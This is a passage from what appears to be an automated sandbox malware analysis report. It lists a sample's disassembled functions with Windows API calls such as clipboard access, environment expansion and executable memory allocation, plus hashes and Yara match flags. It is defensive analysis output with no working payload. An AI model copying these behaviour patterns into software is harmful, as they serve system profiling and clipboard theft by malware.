                                                            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00433840
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: InformationVolume
                                                            • String ID: :$C$\
                                                            • API String ID: 2039140958-3809124531
                                                            • Opcode ID: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
                                                            • Instruction ID: 1368c0940c647f4f39a91e564e44146e6a68535283266bc39cb5798660f285bc
                                                            • Opcode Fuzzy Hash: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
                                                            • Instruction Fuzzy Hash: 44F06575294701B7E718DF10EC56F1A32E0EB81B44F10482DB245AA1D0D7F5AA19DA5E
                                                            Function 0042B5E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocString
                                                            • String ID: *$,
                                                            • API String ID: 2525500382-162240353
                                                            • Opcode ID: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
                                                            • Instruction ID: 8755544d7d26afcd6c5da590c34bf048d679cfec69adbb61e5b4e032c319a10d
                                                            • Opcode Fuzzy Hash: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
                                                            • Instruction Fuzzy Hash: 2641C27450D7C18ED371CB28845C78BBFE0AB9A324F148A4DE0E94B2E2CB74510ADB97
                                                            Function 004283B9 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 386COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: InstalledMemoryPhysicallySystem
                                                            • String ID: sflQ
                                                            • API String ID: 3960555810-3249545781
                                                            • Opcode ID: 8302543d336a64d61fbfd091ffaf374d6ea3bc29c3405159477e15a25cf067dc
                                                            • Instruction ID: ceaf3b536834eb6ea101402e43ebfa27eafed5b2e0152b17aac62569a04a8eaf
                                                            • Opcode Fuzzy Hash: 8302543d336a64d61fbfd091ffaf374d6ea3bc29c3405159477e15a25cf067dc
                                                            • Instruction Fuzzy Hash: 42E16F70205B918AD7258F39C4A47E7BBE1BF16305F98499EC0EB8B382DB396409CB55
                                                            Function 0042880F Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 322COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: InstalledMemoryPhysicallySystem
                                                            • String ID: sflQ
                                                            • API String ID: 3960555810-3249545781
                                                            • Opcode ID: eda0b82203ec5fd52a02e42ad8bc985fa3b6130ce1cc9c57a209a743f85e5ba8
                                                            • Instruction ID: 4579460111167dd6f514478598ab714a340966e7b3f1678d87b811800d9ff980
                                                            • Opcode Fuzzy Hash: eda0b82203ec5fd52a02e42ad8bc985fa3b6130ce1cc9c57a209a743f85e5ba8
                                                            • Instruction Fuzzy Hash: A7C17F70205B918AD725CF35C4A07E7BBE1BF16304F98495ED0EB8B382DB796409CB55
                                                            Function 0043551D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004355C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID: \-"#
                                                            • API String ID: 3298025750-2514456039
                                                            • Opcode ID: 859eba75cc14126060daa5553d4e99eea4a1c63d27fd1e683f7c5ac40af54193
                                                            • Instruction ID: 4e5805d71c6b113a9038e1d4705d07e5b3b04c5f079926af7e5af699945cb8d6
                                                            • Opcode Fuzzy Hash: 859eba75cc14126060daa5553d4e99eea4a1c63d27fd1e683f7c5ac40af54193
                                                            • Instruction Fuzzy Hash: 5A1151716083019FD708CF50D8A475FFBE2FBC4328F148A1DE4A917691C3B99909CB86
                                                            Function 00414EC0 Relevance: 3.2, APIs: 2, Instructions: 181COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00414EFA
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00414F28
                                                              • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 3432729115-0
                                                            • Opcode ID: c009db615c638526771df0e05fb3056c90e96922816314dcb6ffecc14510497f
                                                            • Instruction ID: 3bef7b545c1fe862b70271ecfb8295d17d8257d1e606da934cadffb5b9659bed
                                                            • Opcode Fuzzy Hash: c009db615c638526771df0e05fb3056c90e96922816314dcb6ffecc14510497f
                                                            • Instruction Fuzzy Hash: C351E0B41043018BD324CF14C891BABBBE5FFC5718F048A1DF9A69B391EB789941CB96
                                                            Function 00417A30 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417A6A
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00417A98
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID:
                                                            • API String ID: 237503144-0
                                                            • Opcode ID: 76c95b86170c2d249fc8a0b579228b811743fa26dcd10391b77df605b8ccdfce
                                                            • Instruction ID: 9d185849e125c65ed9e76077d369fe8678050950fd45e526c791e55ee9a7ec59
                                                            • Opcode Fuzzy Hash: 76c95b86170c2d249fc8a0b579228b811743fa26dcd10391b77df605b8ccdfce
                                                            • Instruction Fuzzy Hash: 0F01D2755482047FD310AB25CC86F67776CEB86764F044619F9668B2D1EB30A908C6B6
                                                            Function 02140E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02140223,?,?), ref: 02140E19
                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02140223,?,?), ref: 02140E1E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: 418359fe583fdca0451b961dad85c986a59d45351fffe631a80bdbc895422709
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: 3FD0123114512877D7002B95DC09BCD7B1CDF09B66F108011FB0DE9080CB70954046E5
                                                            Function 00436D86 Relevance: 1.6, APIs: 1, Instructions: 67libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: dc9adec9b8184aaf73981e838b522b6d47d30a6e16419426b755bca3264c8062
                                                            • Instruction ID: 50cfc2c49a3083e08c64fd866987bc454676edab02516c1ee8da21e686402dde
                                                            • Opcode Fuzzy Hash: dc9adec9b8184aaf73981e838b522b6d47d30a6e16419426b755bca3264c8062
                                                            • Instruction Fuzzy Hash: 4821D2B4501A02AFE715DF25D8D1A2ABBB2FB86305F10C23EC85647B15DB38A455CFD8
                                                            Function 0043724D Relevance: 1.6, APIs: 1, Instructions: 66memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 004372ED
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: ad23319594c346ecf424d56c5213ed755dd05cb4f309e994e67b51aad4c8c90e
                                                            • Instruction ID: d108b6c160ddb040137915c382c094585e6d719fb6ca8c5299172bcdf25914e1
                                                            • Opcode Fuzzy Hash: ad23319594c346ecf424d56c5213ed755dd05cb4f309e994e67b51aad4c8c90e
                                                            • Instruction Fuzzy Hash: 131113751083409FD700CF04D49470BB7A2EFC5318F65CA5CE8A81B25AC379A90ACB9A
                                                            Function 004372F8 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0043738D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 8b4b31e72015f58f2354e1bb9d9c3a9735f796f91b91e2fab4406d122cedec8b
                                                            • Instruction ID: ee8488e267e88be69cd1f03818601e052f7114df8572ecc488c32b2c78a41869
                                                            • Opcode Fuzzy Hash: 8b4b31e72015f58f2354e1bb9d9c3a9735f796f91b91e2fab4406d122cedec8b
                                                            • Instruction Fuzzy Hash: 6F11E87010C3409FD718CF14D46476FBBE1EFC5718F148A1DE8AA1B692C379991ACB8A
                                                            Function 00435440 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 79dca1b32247aa9b70ad2c1bcd7dcd008df1434939f9a33d85ef6ce44ca53825
                                                            • Instruction ID: 3dda7e75f36cf504926de81a89fda72ed932754256e5c243a5fe3c5ff6ff8171
                                                            • Opcode Fuzzy Hash: 79dca1b32247aa9b70ad2c1bcd7dcd008df1434939f9a33d85ef6ce44ca53825
                                                            • Instruction Fuzzy Hash: 731125705083009FD708CF10C46476BBBA1EB85328F108A1DE8A917681C379DA09CBC6
                                                            Function 004373E0 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LdrInitializeThunk.NTDLL(0043A22C,005C003F,00000006,00120089,?,00000018,' !",00000000,004150CA), ref: 00437406
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                            • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                                                            • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                            • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                                                            Function 007BE44D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007BE49E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7bd000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction ID: dfcc746af1e8c57c305570b1ecb3ce30dabedbc395f69af5343f3667ff9f189e
                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction Fuzzy Hash: 35112B79A00208EFDB01DF98C989E98BBF5AF08351F0580A4F9489B362D775EA50DB80

                                                            Non-executed Functions

                                                            Function 0042EAB0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127clipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
                                                            • String ID: @$A$C$F
                                                            • API String ID: 3829817484-319984173
                                                            • Opcode ID: 8ad0d9297b1ef162b2248c3ebd06f01706d8c7b0091a801e9c92d9469685e51b
                                                            • Instruction ID: 15be754739b74540689589334df2f87df7105b9426ed1557cb94c4d1065241c1
                                                            • Opcode Fuzzy Hash: 8ad0d9297b1ef162b2248c3ebd06f01706d8c7b0091a801e9c92d9469685e51b
                                                            • Instruction Fuzzy Hash: 9B513D7060C391CFD300DF6AA48875FBFE0AB96364F940A6EF4D58A291C738954A8B57
                                                            Function 004016E0 Relevance: 15.5, Strings: 12, Instructions: 492COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$.$0$Uh$C$Wn$[$false$null$true${$+$8o
                                                            • API String ID: 0-879020378
                                                            • Opcode ID: b6e0a92ae582881cf6e2ff09ca5e905cd5929e3ea3787b5d42416239a9d202b1
                                                            • Instruction ID: bd7178ecccf1f1e773a4192e4ca540b31a3e3f12fd5816677c43404a507449fe
                                                            • Opcode Fuzzy Hash: b6e0a92ae582881cf6e2ff09ca5e905cd5929e3ea3787b5d42416239a9d202b1
                                                            • Instruction Fuzzy Hash: B9F104B0A003059FE7105F65D885727BBE4AF54308F14853EE886A73E2EB3DE914CB5A
                                                            Function 00417062 Relevance: 10.3, Strings: 8, Instructions: 344COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                            • API String ID: 0-4068174152
                                                            • Opcode ID: 0a8ceca14b6d57825b30a63cf70770cde9fe89ef20bcca57d177dbff602c7479
                                                            • Instruction ID: c5e2fc403fb0cec226c3ddd8a9dc625652c1aa2ba632ddc363c6cf4a8812eb13
                                                            • Opcode Fuzzy Hash: 0a8ceca14b6d57825b30a63cf70770cde9fe89ef20bcca57d177dbff602c7479
                                                            • Instruction Fuzzy Hash: CBC1AAB1104B018BD328CF14C5A1B63B7B2FF56318F28865DC8A64BB91E779F891CB94
                                                            Function 021572C9 Relevance: 10.3, Strings: 8, Instructions: 344COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                            • API String ID: 0-4068174152
                                                            • Opcode ID: fff0af72006f123bcc6fc661a3252df57c55cfd64bb4fe08b2f90c9271b5dd27
                                                            • Instruction ID: 1abb186318c17f935596529a03df70b2ef4865c58d783448044f300ba306106b
                                                            • Opcode Fuzzy Hash: fff0af72006f123bcc6fc661a3252df57c55cfd64bb4fe08b2f90c9271b5dd27
                                                            • Instruction Fuzzy Hash: 2BC146B1540A11CBD728CF14C4A2722F7B2FF56318F198A9CC8A64BB91E775E856CB90
                                                            Function 004223B8 Relevance: 9.3, Strings: 7, Instructions: 552COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID: "$"(B$0$5Q$B(B$P%B$b%B
                                                            • API String ID: 1279760036-2560538612
                                                            • Opcode ID: 3b9de29d937a85441e7a85420de6bba4d0615bab3f6ee0a5bf3cd202b46f7243
                                                            • Instruction ID: ae90b01d8c300a32a6ec655623065aa85ae112dbe4b9f4c81515b6d4964649e2
                                                            • Opcode Fuzzy Hash: 3b9de29d937a85441e7a85420de6bba4d0615bab3f6ee0a5bf3cd202b46f7243
                                                            • Instruction Fuzzy Hash: 851266316083909FD324CF28D85076ABBE2AFC6324F59866EE4958B3E1C779CD45CB46
                                                            Function 02149BC7 Relevance: 6.7, Strings: 5, Instructions: 472COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0$01$ZR\;$[hct${hmn
                                                            • API String ID: 0-1484469362
                                                            • Opcode ID: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
                                                            • Instruction ID: 007013004dec10a83d97858088063d87804d5333ad62152020e0e8179f23f510
                                                            • Opcode Fuzzy Hash: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
                                                            • Instruction Fuzzy Hash: AC1202B01483818BE324CF54C4A4B6FBBE5BBD6348F144D1DE5E98B291D77AD409CB92
                                                            Function 00423C97 Relevance: 6.6, APIs: 4, Instructions: 619COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 00423D8D
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 00423DB6
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 004241CD
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 004241FB
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID:
                                                            • API String ID: 237503144-0
                                                            • Opcode ID: b0be70804cc91492d3ad46a995d1acc169f42f3db6c0a87da9a9870da7ebcf71
                                                            • Instruction ID: e81b59cdcbc34e311b7fbd4a7f811c95e6a6bbd50fbc0b950e223fe6d83b0846
                                                            • Opcode Fuzzy Hash: b0be70804cc91492d3ad46a995d1acc169f42f3db6c0a87da9a9870da7ebcf71
                                                            • Instruction Fuzzy Hash: 6D3257B4600B009FD728CF29C495B17BBB2FB85314F158A5DE8A64BB89D774E809CBD1
                                                            Function 02163EFE Relevance: 6.6, APIs: 4, Instructions: 619COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 02163FF4
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0216401D
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,00000000,?), ref: 02164434
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,?,?), ref: 02164462
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID:
                                                            • API String ID: 237503144-0
                                                            • Opcode ID: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
                                                            • Instruction ID: 4718b544a6de1f830abcd6fea7fefac3606708de28e76746f5a4b8b03e07dba3
                                                            • Opcode Fuzzy Hash: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
                                                            • Instruction Fuzzy Hash: CB3256B4500B009FD728CF29C495B17BBB2FB85314F148A5CE8A64BB89D774E81ACBD1
                                                            Function 02163ECF Relevance: 6.6, APIs: 4, Instructions: 614COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 02163FF4
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0216401D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID:
                                                            • API String ID: 237503144-0
                                                            • Opcode ID: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
                                                            • Instruction ID: e2fbe04f1313733a041577a7bc05830bce00002ab7a558fa2ff117151a5d3f60
                                                            • Opcode Fuzzy Hash: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
                                                            • Instruction Fuzzy Hash: 683255B4500B009FD728CF28C895B17BBB2BF85314F158A5CD8A64BB99D774E81ACBD1
                                                            Function 00421C71 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID: /V.W$2 B$J>;0$gdeb
                                                            • API String ID: 1279760036-1943473526
                                                            • Opcode ID: 2bfca7db6f4ada60a34e9a6b076439903345c5ab51bf10ddfbacd352a3a3d751
                                                            • Instruction ID: 1f1b32295078fd643b98cacce706d452a3674876845b3b7fea61ac9470719d4c
                                                            • Opcode Fuzzy Hash: 2bfca7db6f4ada60a34e9a6b076439903345c5ab51bf10ddfbacd352a3a3d751
                                                            • Instruction Fuzzy Hash: A1D18AB56083518FC724CF28D89072BBBE1BFCA314F954A6DE89987391D774E901CB86
                                                            Function 02161C89 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #M*O$.A+C$<Y9[$de
                                                            • API String ID: 0-619215113
                                                            • Opcode ID: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
                                                            • Instruction ID: 09bcfb0e799169c3a6c0110c20c2f5b1c0b805ec17b8c3709c981b2b52f833d7
                                                            • Opcode Fuzzy Hash: 511338df0e01b7e020f68d2e2ffe54247379295d5db2bf8c1464e1bb9d8b3272
